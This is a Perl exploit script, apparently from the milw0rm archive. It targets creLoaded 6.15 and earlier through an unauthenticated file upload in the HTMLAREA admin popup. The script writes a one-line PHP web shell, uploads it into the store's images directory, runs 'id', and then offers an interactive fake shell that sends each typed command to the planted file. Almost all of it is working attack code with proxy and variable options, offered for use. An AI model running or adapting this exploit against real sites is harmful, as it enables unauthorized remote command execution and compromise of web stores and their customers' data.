#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
#
# Rather simple exploit, but still an exploit nonetheless.  Attempts to upload php script and 
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# 	* User-defined PHP script or one provided in this script (suits most occasions)
# 	* Additional variables to pass to PHP script after upload
# 	* HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#

print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";

use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;

my $baseurl = "/admin/htmlarea/popups/file/files.php";

my $status = getopts('s:p:a:');
if(@ARGV < 1) { die(usage()); }

my %vars, $response, $masterurl, $browser, $cmd;
$masterurl = @ARGV[0];
$browser = LWP::UserAgent->new;

if($opt_s) {
	print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}

if($opt_p) {
	$browser->proxy(['http', 'https'] => $opt_p);
	print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}

if($opt_a) {
	@tmp = split(",",$opt_a);
	foreach $tmpvar (@tmp) {
		@tmp2 = split("=",$tmpvar);
		$vars{$tmp2[0]} = $tmp2[1];
		print "[+] Adding variable '" . $tmp2[0] . "' with value '" . $tmp2[1] . "'\n";
	}
}

sub usage 
{
	print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] URL\n\n";
	print "-a - additional variables i.e. -aaction=create,cid=12\n";
	print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
	print "-s - specify path to user-defined script instead of using default\n";
	print "URL - http://vuln/store\n\n";
	exit;
}

sub sendform 
{
	if($opt_G) {
		my $url = $masterurl . "?";
		# Non-issue, but could beautify the single line here at a later date.
		foreach $tmp (keys (%vars)) {
			$url .= "\&$tmp=" . $vars{$tmp};
		}
		$response = $browser->get($url);
		die "Failed to get!" unless defined $response;
	} else {
		$response = $browser->post($masterurl, \%vars);
		die "Failed to post!" unless defined $response;
	}
}

if(!$opt_s) {
	# Lazy.
	print "[*] Creating 'default' PHP script\n";
	$tmp = "<?php system(\$a); ?>";
	open(FILE, "> /tmp/default.php");
	print FILE $tmp;
	close(FILE);
	$opt_s = "/tmp/default.php";
}

open(FILE, "< $opt_s");
@content = <FILE>;
close(FILE);

if(!$vars{"dirPath"}) {
	print "[*] Setting upload path to $masterurl/images\n";
	$vars{"dirPath"} = "/../images/";
}
$tmp = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$browser->timeout(10);
$req = POST $tmp, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
$browser->timeout(180);
$term = Term::ReadLine->new('cre');

print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/default.php";
$vars{"a"} = "id";
&sendform;
print $response->content;
while(1) {
	$prompt = "bash-2.05b\$ ";
	$tmp = $term->readline($prompt, "");
	$cmd = $tmp;
	
	if(($cmd eq "quit") || ($cmd eq "exit")) {
		exit;
	}

	$vars{"a"} = $cmd;
	&sendform;
	print $response->content;
}

# milw0rm.com [2006-01-24]
